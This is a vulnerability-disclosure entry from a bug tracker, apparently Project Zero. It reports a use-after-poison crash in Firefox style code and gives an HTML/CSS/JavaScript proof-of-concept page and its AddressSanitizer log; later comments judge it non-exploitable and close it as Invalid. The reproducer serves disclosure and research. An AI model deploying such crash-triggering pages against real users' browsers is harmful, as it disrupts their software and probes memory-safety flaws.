New issue
Advanced search Search tips
Starred by 1 user
Status: Invalid
Owner:
Closed: Feb 2017
Cc:



Sign in to add a comment
Mozilla Firefox: use-after-poison in nsStylePadding::GetPadding
Project Member Reported by ifratric@google.com, Feb 17 2017 Back to list
Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340593

There is a use-after-poison issue in Firefox. The vulnerability was confirmed on the nightly ASan build. 

PoC:

=================================================================

<style>
* { padding: inherit; }
</style>
<script>
function go() {
  var s = menu.style;
  s.setProperty("scroll-snap-destination", "1px 63%");
  s.setProperty("padding-left", "66%");
  button.scrollBy({left: 60, top: -1});
  th.vAlign = "top";
  s.setProperty("animation-fill-mode", "forwards");
}
</script>
<body onload=go()>
<button id="button" hidden="hidden"></button>
<table>
<th id="th">foo</th>
<menu id="menu">
<menu>foo</menu>

=================================================================

ASan log:

=================================================================
==78996==ERROR: AddressSanitizer: use-after-poison on address 0x625000b05790 at pc 0x7efe7287f223 bp 0x7ffc444d1e00 sp 0x7ffc444d1df8
READ of size 1 at 0x625000b05790 thread T0
    #0 0x7efe7287f222 in ConvertsToLength /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43
    #1 0x7efe7287f222 in nsStylePadding::GetPadding(nsMargin&) const /home/worker/workspace/build/src/layout/style/nsStyleStruct.h:1070
    #2 0x7efe728899b9 in mozilla::SizeComputationInput::ComputePadding(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2921:25
    #3 0x7efe72872d9f in mozilla::SizeComputationInput::InitOffsets(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*, mozilla::SizeComputationInput::ReflowInputFlags, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2548:23
    #4 0x7efe72879162 in mozilla::ReflowInput::InitConstraints(nsPresContext*, mozilla::LogicalSize const&, nsMargin const*, nsMargin const*, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2226:5
    #5 0x7efe728712b4 in mozilla::ReflowInput::Init(nsPresContext*, mozilla::LogicalSize const*, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:399:3
    #6 0x7efe728dde05 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:166:25
    #7 0x7efe728ddf90 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:175:17
    #8 0x7efe728d4fae in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3298:7
    #9 0x7efe728c9606 in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
    #10 0x7efe728c9606 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2368
    #11 0x7efe728bfc92 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #12 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #13 0x7efe72921a52 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
    #14 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #15 0x7efe729c7e3a in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
    #16 0x7efe729c92b0 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
    #17 0x7efe729ccadb in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3
    #18 0x7efe72933792 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3
    #19 0x7efe728a5759 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7
    #20 0x7efe726a64dc in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9260:3
    #21 0x7efe726b9f44 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9433:24
    #22 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
    #23 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
    #24 0x7efe72634121 in nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2203:5
    #25 0x7efe726295b0 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1842:7
    #26 0x7efe726339fa in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2137:5
    #27 0x7efe6dd939a7 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:495:5
    #28 0x7efe6de7cefb in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:584:5
    #29 0x7efe6d1e3f71 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1537:20
    #30 0x7efe6cba8fb0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1795:14
    #31 0x7efe6cba54ec in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:17
    #32 0x7efe6cba7b24 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1603:5
    #33 0x7efe6cba816e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1636:5
    #34 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #35 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #36 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #37 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #38 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #39 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #40 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #41 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #42 0x7efe7575ac0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #43 0x7efe7575c708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #44 0x7efe7575d9cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #45 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #46 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #47 0x7efe8714882f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #48 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)

0x625000b05790 is located 5776 bytes inside of 8192-byte region [0x625000b04100,0x625000b06100)
allocated by thread T0 here:
    #0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7efe84725a24 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7efe72620fc1 in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:239
    #5 0x7efe72513c24 in operator new /home/worker/workspace/build/src/layout/style/nsRuleNode.h:152
    #6 0x7efe72513c24 in SetStyleData /home/worker/workspace/build/src/layout/style/nsRuleNode.h:303
    #7 0x7efe72513c24 in PropagateDependentBit /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:1904
    #8 0x7efe72513c24 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2566
    #9 0x7efe724e3f47 in nsStyleTextReset const* nsRuleNode::GetStyleTextReset<true>(nsStyleContext*) /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
    #10 0x7efe72582d6f in DoGetStyleTextReset<true> /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
    #11 0x7efe72582d6f in StyleTextReset /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92
    #12 0x7efe72582d6f in nsStyleContext::SetStyleBits() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:706
    #13 0x7efe72582b76 in FinishConstruction /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:171:3
    #14 0x7efe72582b76 in nsStyleContext::nsStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, already_AddRefed<nsRuleNode>, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:129
    #15 0x7efe72591449 in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1368:5
    #16 0x7efe725b318f in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:943:14
    #17 0x7efe725b80d9 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1393:10
    #18 0x7efe725b78cc in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
    #19 0x7efe725b78cc in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350
    #20 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:121:12
    #21 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85
    #22 0x7efe7276d06c in nsCSSFrameConstructor::MaybeRecreateFramesForElement(mozilla::dom::Element*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9331
    #23 0x7efe726687fc in mozilla::GeckoRestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:164:7
    #24 0x7efe726f57d3 in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:95:5
    #25 0x7efe726f57d3 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:262
    #26 0x7efe7266c9bf in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/GeckoRestyleManager.h:386:7
    #27 0x7efe7266c9bf in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:505
    #28 0x7efe726b8bdb in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
    #29 0x7efe726b8bdb in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4197
    #30 0x7efe726a7e80 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/PresShell.cpp:4073:3
    #31 0x7efe726a7e80 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/PresShell.cpp:4041
    #32 0x7efe726a7e80 in mozilla::PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9088
    #33 0x7efe726ba0e9 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9445:7
    #34 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
    #35 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
    #36 0x7efe72638d25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
    #37 0x7efe726389e2 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:326:5
    #38 0x7efe7263b063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
    #39 0x7efe7263b063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
    #40 0x7efe72636157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
    #41 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #42 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #43 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #44 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #45 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #46 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #47 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #48 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19

SUMMARY: AddressSanitizer: use-after-poison /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43 in ConvertsToLength
Shadow bytes around the buggy address:
  0x0c4a80158aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4a80158af0: 00 00[f7]f7 f7 f7 f7 00 00 00 00 00 00 00 00 00
  0x0c4a80158b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==78996==ABORTING


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member Comment 1 by ifratric@google.com, Feb 21 2017
This bug is likely non-exploitable due to Firefox frame poisoning.
Project Member Comment 2 by ifratric@google.com, Feb 28 2017
Labels: -Restrict-View-Commit
Status: Invalid
Given that the issue is nonexploitable, Mozilla has derestricted their bug and won't be releasing an advisory. Marking this bug as "invalid" and derestricting.
Sign in to add a comment